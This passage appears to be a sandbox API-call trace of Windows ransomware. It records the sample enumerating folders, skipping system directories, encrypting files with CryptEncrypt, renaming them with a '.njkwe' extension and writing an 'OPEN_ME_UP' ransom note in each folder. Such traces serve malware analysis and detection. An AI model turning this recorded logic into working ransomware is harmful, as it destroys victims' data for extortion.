[0061.977] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.978] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.978] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0061.978] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.978] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\3076\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.978] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.979] CloseHandle (hObject=0x428) returned 1 [0061.979] GetProcessHeap () returned 0xbe0000 [0061.979] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.979] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="3082", cAlternateFileName="")) returned 1 [0061.979] lstrcmpiW (lpString1="3082", lpString2="Windows") returned -1 [0061.979] lstrcmpiW (lpString1="3082", lpString2="$Recycle.bin") returned 1 [0061.979] lstrcmpiW (lpString1="3082", lpString2="System Volume Information") returned -1 [0061.979] lstrcmpiW (lpString1="3082", lpString2="Program Files") returned -1 [0061.979] lstrcmpiW (lpString1="3082", lpString2="Program Files (x86)") returned -1 [0061.979] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082") returned 30 [0061.979] lstrcmpW (lpString1="3082", lpString2=".") returned 1 [0061.979] lstrcmpW (lpString1="3082", lpString2="..") returned 1 [0061.979] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\3082", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.979] GetProcessHeap () returned 0xbe0000 [0061.979] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.979] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\*") returned 32 [0061.979] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0e0 [0061.980] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.980] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.980] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.980] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.980] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.980] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\.") returned 32 [0061.980] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.980] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.980] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.980] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.980] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.980] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.980] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.980] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\..") returned 33 [0061.980] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.980] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.980] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.980] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.980] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.980] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.980] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.980] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.980] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 39 [0061.980] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.980] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.981] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.981] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.981] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.981] GetTickCount () returned 0x114feb4 [0061.981] GetTickCount () returned 0x114feb4 [0061.981] GetTickCount () returned 0x114feb4 [0061.981] GetTickCount () returned 0x114feb4 [0061.981] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.981] GetProcessHeap () returned 0xbe0000 [0061.981] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.981] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xbfd, lpOverlapped=0x0) returned 1 [0061.983] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff403, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.983] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xbfd, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xbfd, lpOverlapped=0x0) returned 1 [0061.983] GetProcessHeap () returned 0xbe0000 [0061.983] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.983] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.983] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.983] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.983] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.984] CloseHandle (hObject=0x42c) returned 1 [0061.984] GetProcessHeap () returned 0xbe0000 [0061.984] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.984] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.986] GetProcessHeap () returned 0xbe0000 [0061.986] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.986] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.986] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.986] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.986] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.986] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.986] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.986] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 48 [0061.986] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.986] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.986] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.987] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.987] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.987] GetTickCount () returned 0x114fec4 [0061.987] GetTickCount () returned 0x114fec4 [0061.987] GetTickCount () returned 0x114fec4 [0061.987] GetTickCount () returned 0x114fec4 [0061.987] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.987] GetProcessHeap () returned 0xbe0000 [0061.987] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.987] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.989] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.989] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.990] GetProcessHeap () returned 0xbe0000 [0061.990] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.990] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.990] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.990] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.990] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.990] CloseHandle (hObject=0x42c) returned 1 [0061.992] GetProcessHeap () returned 0xbe0000 [0061.992] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.992] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.993] GetProcessHeap () returned 0xbe0000 [0061.993] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.993] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.993] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.993] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.993] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.993] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.993] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.993] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 49 [0061.993] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.993] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.993] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.993] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.993] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.993] GetTickCount () returned 0x114fec4 [0061.993] GetTickCount () returned 0x114fec4 [0061.993] GetTickCount () returned 0x114fec4 [0061.993] GetTickCount () returned 0x114fec4 [0061.993] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.994] GetProcessHeap () returned 0xbe0000 [0061.994] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.994] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.995] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.995] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.996] GetProcessHeap () returned 0xbe0000 [0061.996] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.996] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.996] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.996] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.996] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.996] CloseHandle (hObject=0x42c) returned 1 [0061.997] GetProcessHeap () returned 0xbe0000 [0061.997] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.997] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.998] GetProcessHeap () returned 0xbe0000 [0061.998] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.998] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.998] FindClose (in: hFindFile=0xc1a0e0 | out: hFindFile=0xc1a0e0) returned 1 [0061.998] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.998] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\3082\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.998] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.999] CloseHandle (hObject=0x428) returned 1 [0061.999] GetProcessHeap () returned 0xbe0000 [0061.999] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.999] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Client", cAlternateFileName="")) returned 1 [0061.999] lstrcmpiW (lpString1="Client", lpString2="Windows") returned -1 [0061.999] lstrcmpiW (lpString1="Client", lpString2="$Recycle.bin") returned 1 [0061.999] lstrcmpiW (lpString1="Client", lpString2="System Volume Information") returned -1 [0061.999] lstrcmpiW (lpString1="Client", lpString2="Program Files") returned -1 [0061.999] lstrcmpiW (lpString1="Client", lpString2="Program Files (x86)") returned -1 [0061.999] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client") returned 32 [0061.999] lstrcmpW (lpString1="Client", lpString2=".") returned 1 [0062.000] lstrcmpW (lpString1="Client", lpString2="..") returned 1 [0062.000] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\Client", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0062.000] GetProcessHeap () returned 0xbe0000 [0062.000] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0062.000] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\*") returned 34 [0062.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d20 [0062.000] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0062.000] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0062.000] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0062.000] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0062.000] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0062.000] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\.") returned 34 [0062.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.000] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, 